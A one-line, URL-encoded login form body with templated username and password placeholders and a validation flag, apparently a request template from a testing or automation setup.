         _charset_=utf-8&j_username={{rr_username}}&j_password={{rr_password}}&j_validate=true